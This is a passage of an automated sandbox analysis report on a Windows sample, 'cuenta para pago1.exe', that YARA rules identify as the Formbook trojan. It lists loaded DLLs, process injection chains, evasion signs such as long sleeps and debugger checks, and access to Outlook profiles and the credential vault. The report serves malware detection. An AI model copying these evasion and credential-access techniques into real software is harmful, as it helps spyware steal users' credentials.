        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: ieframe.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: netapi32.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: version.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: mlang.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: winsqlite3.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: vaultcli.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: cryptbase.dll
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe Section loaded: wininet.dll
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe Section loaded: rasadhlp.dll
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe Section loaded: fwpuclnt.dll
        Source: cuenta para pago1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/10@30/15
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040326A
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_00404579 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404579
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_00402095
        Source: C:\Users\user\Desktop\cuenta para pago1.exe File created: C:\Users\user\Pictures\industrialisere
        Source: C:\Users\user\Desktop\cuenta para pago1.exe File created: C:\Users\user\AppData\Local\Temp\nssDA2C.tmp
        Source: cuenta para pago1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\cuenta para pago1.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: cuenta para pago1.exe ReversingLabs: Detection: 47%
        Source: C:\Users\user\Desktop\cuenta para pago1.exe File read: C:\Users\user\Desktop\cuenta para pago1.exe
        Source: unknown Process created: C:\Users\user\Desktop\cuenta para pago1.exe C:\Users\user\Desktop\cuenta para pago1.exe
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Process created: C:\Users\user\Desktop\cuenta para pago1.exe C:\Users\user\Desktop\cuenta para pago1.exe
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe Process created: C:\Windows\SysWOW64\rasautou.exe C:\Windows\SysWOW64\rasautou.exe
        Source: C:\Windows\SysWOW64\rasautou.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Windows\SysWOW64\rasautou.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: cuenta para pago1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: cuenta para pago1.exe, 00000002.00000003.4095218580.000000003453C000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4099312779.00000000346E3000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: cuenta para pago1.exe, cuenta para pago1.exe, 00000002.00000003.4095218580.000000003453C000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4099312779.00000000346E3000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: rasautou.pdbGCTL source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rasautou.pdb source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara match File source: 00000002.00000002.4188957643.0000000001794000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000002.4059690339.0000000004F84000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\cuenta para pago1.exe File created: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll (dropped file)
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rasautou.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34901763 rdtsc 2_2_34901763
        Source: C:\Windows\SysWOW64\rasautou.exe Window / User API: threadDelayed 9838
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll (dropped file)
        Source: C:\Users\user\Desktop\cuenta para pago1.exe API coverage: 0.3 %
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 4564 Thread sleep count: 122 > 30
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 4564 Thread sleep time: -244000s >= -30000s
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 9128 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 4564 Thread sleep count: 9838 > 30
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 4564 Thread sleep time: -19676000s >= -30000s
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe TID: 4644 Thread sleep time: -100000s >= -30000s
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe TID: 4644 Thread sleep time: -40500s >= -30000s
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe TID: 4644 Thread sleep count: 45 > 30
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe TID: 4644 Thread sleep time: -45000s >= -30000s
        Source: C:\Windows\SysWOW64\rasautou.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_0040635D FindFirstFileW,FindClose, 0_2_0040635D
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040580B
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
        Source: cuenta para pago1.exe, 00000002.00000002.4198736310.0000000004628000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
        Source: cuenta para pago1.exe, 00000002.00000003.4096502054.0000000004691000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWE
        Source: cuenta para pago1.exe, 00000002.00000003.4096502054.0000000004691000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\cuenta para pago1.exe API call chain: ExitProcess graph end node graph_0-4548
        Source: C:\Users\user\Desktop\cuenta para pago1.exe API call chain: ExitProcess graph end node graph_0-4551
        Source: C:\Windows\SysWOW64\rasautou.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\rasautou.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_00405648 CreateDirectoryW,GetLastError,GetLastError,LdrInitializeThunk,SetFileSecurityW,GetLastError, 0_2_00405648
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CC6E0 mov eax, dword ptr fs:[00000030h]2_2_348CC6E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C56E0 mov eax, dword ptr fs:[00000030h]2_2_348C56E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C56E0 mov eax, dword ptr fs:[00000030h]2_2_348C56E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C56E0 mov eax, dword ptr fs:[00000030h]2_2_348C56E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E66E0 mov eax, dword ptr fs:[00000030h]2_2_348E66E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E66E0 mov eax, dword ptr fs:[00000030h]2_2_348E66E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348ED600 mov eax, dword ptr fs:[00000030h]2_2_348ED600
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348ED600 mov eax, dword ptr fs:[00000030h]2_2_348ED600
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F607 mov eax, dword ptr fs:[00000030h]2_2_3497F607
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994600 mov eax, dword ptr fs:[00000030h]2_2_34994600
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C5622 mov eax, dword ptr fs:[00000030h]2_2_348C5622
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C5622 mov eax, dword ptr fs:[00000030h]2_2_348C5622
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C7623 mov eax, dword ptr fs:[00000030h]2_2_348C7623
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496D62C mov ecx, dword ptr fs:[00000030h]2_2_3496D62C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496D62C mov ecx, dword ptr fs:[00000030h]2_2_3496D62C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496D62C mov eax, dword ptr fs:[00000030h]2_2_3496D62C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C0630 mov eax, dword ptr fs:[00000030h]2_2_348C0630
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F0630 mov eax, dword ptr fs:[00000030h]2_2_348F0630
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BD64A mov eax, dword ptr fs:[00000030h]2_2_348BD64A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BD64A mov eax, dword ptr fs:[00000030h]2_2_348BD64A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C3640 mov eax, dword ptr fs:[00000030h]2_2_348C3640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF640 mov eax, dword ptr fs:[00000030h]2_2_348DF640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF640 mov eax, dword ptr fs:[00000030h]2_2_348DF640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF640 mov eax, dword ptr fs:[00000030h]2_2_348DF640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FC640 mov eax, dword ptr fs:[00000030h]2_2_348FC640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FC640 mov eax, dword ptr fs:[00000030h]2_2_348FC640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F265C mov eax, dword ptr fs:[00000030h]2_2_348F265C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F265C mov ecx, dword ptr fs:[00000030h]2_2_348F265C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F265C mov eax, dword ptr fs:[00000030h]2_2_348F265C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C965A mov eax, dword ptr fs:[00000030h]2_2_348C965A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C965A mov eax, dword ptr fs:[00000030h]2_2_348C965A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902670 mov eax, dword ptr fs:[00000030h]2_2_34902670
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902670 mov eax, dword ptr fs:[00000030h]2_2_34902670
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F666D mov esi, dword ptr fs:[00000030h]2_2_348F666D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F666D mov eax, dword ptr fs:[00000030h]2_2_348F666D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F666D mov eax, dword ptr fs:[00000030h]2_2_348F666D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B7662 mov eax, dword ptr fs:[00000030h]2_2_348B7662
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B7662 mov eax, dword ptr fs:[00000030h]2_2_348B7662
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B7662 mov eax, dword ptr fs:[00000030h]2_2_348B7662
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D3660 mov eax, dword ptr fs:[00000030h]2_2_348D3660
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D3660 mov eax, dword ptr fs:[00000030h]2_2_348D3660
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D3660 mov eax, dword ptr fs:[00000030h]2_2_348D3660
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C0670 mov eax, dword ptr fs:[00000030h]2_2_348C0670
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B781 mov eax, dword ptr fs:[00000030h]2_2_3499B781
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B781 mov eax, dword ptr fs:[00000030h]2_2_3499B781
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F1796 mov eax, dword ptr fs:[00000030h]2_2_348F1796
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F1796 mov eax, dword ptr fs:[00000030h]2_2_348F1796
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349917BC mov eax, dword ptr fs:[00000030h]2_2_349917BC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C07A7 mov eax, dword ptr fs:[00000030h]2_2_348C07A7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498D7A7 mov eax, dword ptr fs:[00000030h]2_2_3498D7A7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498D7A7 mov eax, dword ptr fs:[00000030h]2_2_3498D7A7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498D7A7 mov eax, dword ptr fs:[00000030h]2_2_3498D7A7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F7CF mov eax, dword ptr fs:[00000030h]2_2_3497F7CF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE7E0 mov eax, dword ptr fs:[00000030h]2_2_348EE7E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C77F9 mov eax, dword ptr fs:[00000030h]2_2_348C77F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C77F9 mov eax, dword ptr fs:[00000030h]2_2_348C77F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F717 mov eax, dword ptr fs:[00000030h]2_2_3497F717
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E270D mov eax, dword ptr fs:[00000030h]2_2_348E270D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E270D mov eax, dword ptr fs:[00000030h]2_2_348E270D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E270D mov eax, dword ptr fs:[00000030h]2_2_348E270D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CD700 mov ecx, dword ptr fs:[00000030h]2_2_348CD700
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB705 mov eax, dword ptr fs:[00000030h]2_2_348BB705
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB705 mov eax, dword ptr fs:[00000030h]2_2_348BB705
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB705 mov eax, dword ptr fs:[00000030h]2_2_348BB705
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB705 mov eax, dword ptr fs:[00000030h]2_2_348BB705
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498970B mov eax, dword ptr fs:[00000030h]2_2_3498970B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498970B mov eax, dword ptr fs:[00000030h]2_2_3498970B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C471B mov eax, dword ptr fs:[00000030h]2_2_348C471B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C471B mov eax, dword ptr fs:[00000030h]2_2_348C471B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E9723 mov eax, dword ptr fs:[00000030h]2_2_348E9723
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F174A mov eax, dword ptr fs:[00000030h]2_2_348F174A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496E750 mov eax, dword ptr fs:[00000030h]2_2_3496E750
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
